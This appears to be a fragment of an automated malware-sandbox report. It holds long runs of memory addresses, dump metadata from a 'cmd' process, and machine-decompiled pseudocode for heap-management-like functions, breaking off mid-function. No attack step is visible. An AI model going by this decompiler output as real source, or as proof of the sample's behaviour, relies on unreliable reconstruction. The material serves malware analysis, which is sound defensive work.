                                                                                                                                          0x03c47bcd
                                                                                                                                          0x03c47bcf
                                                                                                                                          0x03c479e6
                                                                                                                                          0x03c479e6
                                                                                                                                          0x03c479eb
                                                                                                                                          0x03c479eb
                                                                                                                                          0x03c479ef
                                                                                                                                          0x03c479f1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c479f3
                                                                                                                                          0x03c479f5
                                                                                                                                          0x03c479ff
                                                                                                                                          0x03c479ff
                                                                                                                                          0x00000000
                                                                                                                                          0x03c479ff
                                                                                                                                          0x03c479f7
                                                                                                                                          0x03c479fd
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c479fd
                                                                                                                                          0x03c47bd5
                                                                                                                                          0x03c47bd8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ba9
                                                                                                                                          0x03c47bac
                                                                                                                                          0x03c47bb0
                                                                                                                                          0x03c47bb1
                                                                                                                                          0x03c47bb1
                                                                                                                                          0x03c47bb6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47bb6
                                                                                                                                          0x03c47aa7
                                                                                                                                          0x03c47aaa
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ab2
                                                                                                                                          0x03c47ab3
                                                                                                                                          0x03c47ab5
                                                                                                                                          0x03c47aec
                                                                                                                                          0x03c47aef
                                                                                                                                          0x03c47b25
                                                                                                                                          0x03c47b28
                                                                                                                                          0x03c47b62
                                                                                                                                          0x03c47b64
                                                                                                                                          0x03c47b8f
                                                                                                                                          0x03c47b92
                                                                                                                                          0x03c47b96
                                                                                                                                          0x03c47b98
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b9e
                                                                                                                                          0x03c47b9f
                                                                                                                                          0x03c47ba3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ba3
                                                                                                                                          0x03c47b66
                                                                                                                                          0x03c47b68
                                                                                                                                          0x03c47ae2
                                                                                                                                          0x03c47ae2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ae2
                                                                                                                                          0x03c47b6e
                                                                                                                                          0x03c47b72
                                                                                                                                          0x03c47b75
                                                                                                                                          0x03c47b81
                                                                                                                                          0x03c47b85
                                                                                                                                          0x03c47b87
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b31
                                                                                                                                          0x03c47b34
                                                                                                                                          0x03c47b3c
                                                                                                                                          0x03c47b45
                                                                                                                                          0x03c47b46
                                                                                                                                          0x03c47b4f
                                                                                                                                          0x03c47b51
                                                                                                                                          0x03c47b57
                                                                                                                                          0x03c47b59
                                                                                                                                          0x03c47b59
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b59
                                                                                                                                          0x03c47b77
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b77
                                                                                                                                          0x03c47b2a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b2a
                                                                                                                                          0x03c47af1
                                                                                                                                          0x03c47af3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47afb
                                                                                                                                          0x03c47afc
                                                                                                                                          0x03c47afe
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b00
                                                                                                                                          0x03c47b03
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b05
                                                                                                                                          0x03c47b09
                                                                                                                                          0x03c47b0d
                                                                                                                                          0x03c47b0f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b18
                                                                                                                                          0x03c47b1d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47b1d
                                                                                                                                          0x03c47ab7
                                                                                                                                          0x03c47ab9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47abf
                                                                                                                                          0x03c47ac1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ac3
                                                                                                                                          0x03c47ac6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ac8
                                                                                                                                          0x03c47acc
                                                                                                                                          0x03c47ad0
                                                                                                                                          0x03c47ad2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47adb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47adb
                                                                                                                                          0x03c479d6
                                                                                                                                          0x03c479d9
                                                                                                                                          0x03c479dc
                                                                                                                                          0x03c47a91
                                                                                                                                          0x03c47a94
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47a94
                                                                                                                                          0x03c479e2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c479e2
                                                                                                                                          0x03c47a74
                                                                                                                                          0x03c47a7a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47a8a
                                                                                                                                          0x03c47a21
                                                                                                                                          0x03c47a21
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47a21
                                                                                                                                          0x03bdc650
                                                                                                                                          0x03bdc651
                                                                                                                                          0x03bdc656
                                                                                                                                          0x03bdc65c
                                                                                                                                          0x03bdc65d
                                                                                                                                          0x03bdc663
                                                                                                                                          0x03bdc664
                                                                                                                                          0x03bdc66a
                                                                                                                                          0x03bdc66e
                                                                                                                                          0x03c479c5
                                                                                                                                          0x03c479c7
                                                                                                                                          0x00000000
                                                                                                                                          0x03c479c7
                                                                                                                                          0x03bdc67a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e4d26432506008fa0649b7af53125e7f90a4be2da9769d08e6dd946939f5692d
                                                                                                                                          • Instruction ID: 6e5ace1a5c0d9b532c4fccaeed20afed4927f1c066bb1b5dbdd9c414268e2e65
                                                                                                                                          • Opcode Fuzzy Hash: e4d26432506008fa0649b7af53125e7f90a4be2da9769d08e6dd946939f5692d
                                                                                                                                          • Instruction Fuzzy Hash: B8819A756443429FCB25CE14C880A6BB7E8FF84354F1948AAED65DF240E731EE45CBA2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9D616 Relevance: .2, Instructions: 216COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                          			E03C9D616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x3ccd360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x3cc610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x3bbaef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x3cc610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E03C9C70A(__ecx + 0x38, _t150);
				}
				_t79 = E03C9C5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E03C9A359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x3cc610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L03BFFAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E03C01710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x3ccb1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x3cc6110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x3cc610c & 0x00000002;
							_v16 = _t94;
							if(( *0x3cc610c & 0x00000002) == 0) {
								L25:
								_t95 = E03C9D597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E03C9DEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x3ccb1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x3cc6110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x3cc6110 ^ _t159;
										__eflags = _t164;
										 *0x3ccb1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E03BFFA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E03C1B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E03C9A359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}






































                                                                                                                                          0x03c9d625
                                                                                                                                          0x03c9d629
                                                                                                                                          0x03c9d62d
                                                                                                                                          0x03c9d62f
                                                                                                                                          0x03c9d632
                                                                                                                                          0x03c9d638
                                                                                                                                          0x03c9d63f
                                                                                                                                          0x03c9d641
                                                                                                                                          0x03c9d64c
                                                                                                                                          0x03c9d64f
                                                                                                                                          0x03c9d660
                                                                                                                                          0x03c9d651
                                                                                                                                          0x03c9d659
                                                                                                                                          0x03c9d659
                                                                                                                                          0x03c9d667
                                                                                                                                          0x03c9d66e
                                                                                                                                          0x03c9d67c
                                                                                                                                          0x03c9d69a
                                                                                                                                          0x03c9d6a0
                                                                                                                                          0x03c9d6a5
                                                                                                                                          0x03c9d6a7
                                                                                                                                          0x03c9d6ad
                                                                                                                                          0x03c9d6b1
                                                                                                                                          0x03c9d6b2
                                                                                                                                          0x03c9d6b2
                                                                                                                                          0x03c9d6b8
                                                                                                                                          0x03c9d6c1
                                                                                                                                          0x03c9d6c4
                                                                                                                                          0x03c9d6fb
                                                                                                                                          0x03c9d6fd
                                                                                                                                          0x03c9d6fd
                                                                                                                                          0x03c9d6fe
                                                                                                                                          0x03c9d701
                                                                                                                                          0x03c9d703
                                                                                                                                          0x03c9d706
                                                                                                                                          0x03c9d70c
                                                                                                                                          0x03c9d70c
                                                                                                                                          0x03c9d717
                                                                                                                                          0x03c9d71a
                                                                                                                                          0x03c9d720
                                                                                                                                          0x03c9d72d
                                                                                                                                          0x03c9d722
                                                                                                                                          0x03c9d727
                                                                                                                                          0x03c9d729
                                                                                                                                          0x03c9d729
                                                                                                                                          0x03c9d731
                                                                                                                                          0x03c9d76a
                                                                                                                                          0x03c9d76a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d733
                                                                                                                                          0x03c9d749
                                                                                                                                          0x03c9d751
                                                                                                                                          0x03c9d755
                                                                                                                                          0x03c9d75e
                                                                                                                                          0x03c9d760
                                                                                                                                          0x03c9d76c
                                                                                                                                          0x03c9d76c
                                                                                                                                          0x03c9d773
                                                                                                                                          0x03c9d776
                                                                                                                                          0x03c9d786
                                                                                                                                          0x03c9d78c
                                                                                                                                          0x03c9d791
                                                                                                                                          0x03c9d793
                                                                                                                                          0x03c9d796
                                                                                                                                          0x03c9d796
                                                                                                                                          0x03c9d799
                                                                                                                                          0x03c9d79b
                                                                                                                                          0x03c9d79d
                                                                                                                                          0x03c9d7a1
                                                                                                                                          0x03c9d7a5
                                                                                                                                          0x03c9d7a5
                                                                                                                                          0x03c9d7a8
                                                                                                                                          0x03c9d7aa
                                                                                                                                          0x03c9d7aa
                                                                                                                                          0x03c9d7a1
                                                                                                                                          0x03c9d7ad
                                                                                                                                          0x03c9d7af
                                                                                                                                          0x03c9d7d8
                                                                                                                                          0x03c9d7d8
                                                                                                                                          0x03c9d7db
                                                                                                                                          0x03c9d7dd
                                                                                                                                          0x03c9d7e4
                                                                                                                                          0x03c9d7e4
                                                                                                                                          0x03c9d7e4
                                                                                                                                          0x03c9d7e6
                                                                                                                                          0x03c9d7e8
                                                                                                                                          0x03c9d7f0
                                                                                                                                          0x03c9d7f0
                                                                                                                                          0x03c9d7f4
                                                                                                                                          0x03c9d7f9
                                                                                                                                          0x03c9d7fd
                                                                                                                                          0x03c9d805
                                                                                                                                          0x03c9d810
                                                                                                                                          0x03c9d814
                                                                                                                                          0x03c9d816
                                                                                                                                          0x03c9d816
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d7b1
                                                                                                                                          0x03c9d7c2
                                                                                                                                          0x03c9d7c8
                                                                                                                                          0x03c9d7ca
                                                                                                                                          0x03c9d7cc
                                                                                                                                          0x03c9d7d2
                                                                                                                                          0x03c9d7d5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d7d5
                                                                                                                                          0x03c9d7ce
                                                                                                                                          0x03c9d818
                                                                                                                                          0x03c9d818
                                                                                                                                          0x03c9d81b
                                                                                                                                          0x03c9d81d
                                                                                                                                          0x03c9d831
                                                                                                                                          0x03c9d831
                                                                                                                                          0x03c9d835
                                                                                                                                          0x03c9d83b
                                                                                                                                          0x03c9d83d
                                                                                                                                          0x03c9d83d
                                                                                                                                          0x03c9d840
                                                                                                                                          0x03c9d844
                                                                                                                                          0x03c9d84a
                                                                                                                                          0x03c9d84a
                                                                                                                                          0x03c9d861
                                                                                                                                          0x03c9d861
                                                                                                                                          0x03c9d7af
                                                                                                                                          0x03c9d778
                                                                                                                                          0x03c9d77c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d77e
                                                                                                                                          0x03c9d781
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d781
                                                                                                                                          0x03c9d757
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d757
                                                                                                                                          0x03c9d731
                                                                                                                                          0x03c9d6c6
                                                                                                                                          0x03c9d6d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9d6d6
                                                                                                                                          0x03c9d6db
                                                                                                                                          0x03c9d6dd
                                                                                                                                          0x03c9d6e3
                                                                                                                                          0x03c9d6e7
                                                                                                                                          0x03c9d6e8
                                                                                                                                          0x03c9d6e8
                                                                                                                                          0x03c9d6ed
                                                                                                                                          0x03c9d6f0
                                                                                                                                          0x03c9d6f4
                                                                                                                                          0x03c9d6f6
                                                                                                                                          0x03c9d6f6
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a751a70662fa34d7e9bf3958561db0ac3f252872eace3e81a35a6f3e5886b145
                                                                                                                                          • Instruction ID: 05a97cd8bf4c22b05e3a1179cb3da966e5ced3b06922b78997218db79ed59f90
                                                                                                                                          • Opcode Fuzzy Hash: a751a70662fa34d7e9bf3958561db0ac3f252872eace3e81a35a6f3e5886b145
                                                                                                                                          • Instruction Fuzzy Hash: 9A819275E1021A9FDF14DFA9C88866EBBF5FF48300B1A856AD416FB245DB319E11CB80
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9DBD2 Relevance: .2, Instructions: 212COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E03C9DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x3cc6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L03C9D016(_t119, _t183, _t119, _t78);
									E03BEFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E03C9C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x3bbaff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E03BEFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E03C9E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x3bbaff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E03C1D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E03C9D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E03C9D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E03C9A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}








































                                                                                                                                          0x03c9dbdc
                                                                                                                                          0x03c9dbde
                                                                                                                                          0x03c9dbe1
                                                                                                                                          0x03c9dbed
                                                                                                                                          0x03c9dbef
                                                                                                                                          0x03c9dbf7
                                                                                                                                          0x03c9dbfd
                                                                                                                                          0x03c9dc00
                                                                                                                                          0x03c9dc04
                                                                                                                                          0x03c9dc07
                                                                                                                                          0x03c9dc0c
                                                                                                                                          0x03c9dd1f
                                                                                                                                          0x03c9dd1f
                                                                                                                                          0x03c9dd23
                                                                                                                                          0x03c9dd26
                                                                                                                                          0x03c9dd29
                                                                                                                                          0x03c9dd29
                                                                                                                                          0x03c9dd2c
                                                                                                                                          0x03c9dd32
                                                                                                                                          0x03c9dd35
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd38
                                                                                                                                          0x03c9dd3a
                                                                                                                                          0x03c9dd5d
                                                                                                                                          0x03c9dd63
                                                                                                                                          0x03c9dd69
                                                                                                                                          0x03c9dd6e
                                                                                                                                          0x03c9dd71
                                                                                                                                          0x03c9dd78
                                                                                                                                          0x03c9dd7d
                                                                                                                                          0x03c9dd8c
                                                                                                                                          0x03c9dd9e
                                                                                                                                          0x03c9dda0
                                                                                                                                          0x03c9ddad
                                                                                                                                          0x03c9ddb0
                                                                                                                                          0x03c9ddb5
                                                                                                                                          0x03c9ddb9
                                                                                                                                          0x03c9ddd9
                                                                                                                                          0x03c9ddd9
                                                                                                                                          0x03c9ddde
                                                                                                                                          0x03c9dde0
                                                                                                                                          0x03c9dde3
                                                                                                                                          0x03c9dde5
                                                                                                                                          0x03c9dde9
                                                                                                                                          0x03c9dde9
                                                                                                                                          0x03c9ddee
                                                                                                                                          0x03c9ddf6
                                                                                                                                          0x03c9ddf6
                                                                                                                                          0x03c9dd97
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd9b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd9b
                                                                                                                                          0x03c9dd7f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd7f
                                                                                                                                          0x03c9dd3f
                                                                                                                                          0x03c9dd54
                                                                                                                                          0x03c9dd58
                                                                                                                                          0x03c9dd86
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd86
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd5a
                                                                                                                                          0x03c9dd5a
                                                                                                                                          0x03c9dd5a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dd5a
                                                                                                                                          0x03c9dd3f
                                                                                                                                          0x03c9dd38
                                                                                                                                          0x03c9dc12
                                                                                                                                          0x03c9dc15
                                                                                                                                          0x03c9dc25
                                                                                                                                          0x03c9dc31
                                                                                                                                          0x03c9dc34
                                                                                                                                          0x03c9dc3b
                                                                                                                                          0x03c9dc3e
                                                                                                                                          0x03c9dc40
                                                                                                                                          0x03c9dc43
                                                                                                                                          0x03c9dc46
                                                                                                                                          0x03c9dc62
                                                                                                                                          0x03c9dc6b
                                                                                                                                          0x03c9dc6d
                                                                                                                                          0x03c9dc48
                                                                                                                                          0x03c9dc4b
                                                                                                                                          0x03c9dc59
                                                                                                                                          0x03c9dc5c
                                                                                                                                          0x03c9dc5c
                                                                                                                                          0x03c9dc72
                                                                                                                                          0x03c9dc78
                                                                                                                                          0x03c9dc7f
                                                                                                                                          0x03c9dc81
                                                                                                                                          0x03c9dc81
                                                                                                                                          0x03c9dc84
                                                                                                                                          0x03c9dc88
                                                                                                                                          0x03c9dc8d
                                                                                                                                          0x03c9dc95
                                                                                                                                          0x03c9dc9b
                                                                                                                                          0x03c9dca0
                                                                                                                                          0x03c9dca2
                                                                                                                                          0x03c9dca6
                                                                                                                                          0x03c9dca6
                                                                                                                                          0x03c9dcb0
                                                                                                                                          0x03c9dcd1
                                                                                                                                          0x03c9dcd4
                                                                                                                                          0x03c9dcda
                                                                                                                                          0x03c9dcec
                                                                                                                                          0x03c9dcf1
                                                                                                                                          0x03c9dcf6
                                                                                                                                          0x03c9dd0c
                                                                                                                                          0x03c9dd1a
                                                                                                                                          0x03c9dd1a
                                                                                                                                          0x03c9dcf6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9dcda
                                                                                                                                          0x03c9dcb5
                                                                                                                                          0x03c9dcb6
                                                                                                                                          0x03c9dcc5
                                                                                                                                          0x03c9dcca
                                                                                                                                          0x03c9dcca

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6b8730bd0bc7df4ac52724bd76e4e935cf81f4866007c46af5a42b7b3aaeae55
                                                                                                                                          • Instruction ID: 58a3e3e1cf6523d9d9d2536c5f22b6b95f4173d8f2ee7c29aa04751a4b91454c
                                                                                                                                          • Opcode Fuzzy Hash: 6b8730bd0bc7df4ac52724bd76e4e935cf81f4866007c46af5a42b7b3aaeae55
                                                                                                                                          • Instruction Fuzzy Hash: 2E710876E002299FDF14DF59C4889BEB7F5EF88310B1641AAE846EF344D634DA41D7A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA28EC Relevance: .2, Instructions: 211COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                          			E03CA28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
